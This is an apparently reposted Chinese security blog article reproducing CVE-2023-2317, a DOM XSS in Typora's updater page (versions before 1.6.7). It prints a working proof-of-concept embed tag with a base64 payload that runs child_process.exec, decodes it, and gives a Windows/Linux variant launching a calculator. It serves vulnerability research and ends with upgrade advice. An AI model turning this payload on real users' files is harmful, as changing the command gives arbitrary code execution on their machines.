Typora远程代码执行漏洞复现(CVE-2023-2317)
前言
Typora是一款由Abner Lee开发的轻量级Markdown编辑器,适用于OS X、Windows和Linux三种操作系统。如果用户在 Typora 中打开恶意文件,或从恶意网页复制文本并粘贴到 Typora 中,则会导致恶意代码在本地执行。这漏洞出来也有一段时间了,下面我们来简单分析复现一下。
漏洞详情及影响版本
在 Windows 及 Linux 上的 Typora 1.6.7 之前版本中,updater/update.html 內存在一个DOM 的 XSS,可用过在标签中加载typora://app/typemark/updater/update.html 的方式,在 Typora主页面的情況下制作 markdown文件,执行任意 JavaScript 代码。
影响版本
Typora < 1.6.7
正文
Typora1.5.12下载地址(非官方),没找到官方的,我直接搜索从第三方下载了一个
https://mksoftcdn.yesky.com/64f57baf/f200b5674f7956b8742f572bfa71f12a/uploadsoft/typora-setup-x64-1.5.12.exe
查看详情确认一下版本
粘贴下面的poc进行保存
<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnfSlbbmF2aWdhdG9yLnBsYXRmb3JtLnN1YnN0cigwLDUpXSk'))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">
语言选择HTML
保存后即可弹计算器
直接打开md文件也会执行
分析一次POC,主要是看一下base64编码部分的
cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnfSlbbmF2aWdhdG9yLnBsYXRmb3JtLnN1YnN0cigwLDUpXSk
这段代码的原理是使用 Node.js 中的 child_process 模块来执行特定的操作系统命令。
通过三元表达式,使用 navigator.platform.substr(0,5) 来获取当前运行代码的操作系统平台(Windows、macOS、Linux等)。如果是在Win32平台下,就执行calc。
reqnode('child_process').exec(({Win32: 'calc'})[navigator.platform.substr(0,5)])
兼容win和Linux的POC
reqnode('child_process').exec(({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE"'})[navigator.platform.substr(0,5)])
修复建议
目前厂商已发布升级补丁已修复漏洞,请尽快升级
参考
https://loudongyun.360.net/leakDetail/wgDZIzy1cFY%3D
原文始发于微信公众号(pentest):Typora远程代码执行漏洞复现(CVE-2023-2317)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论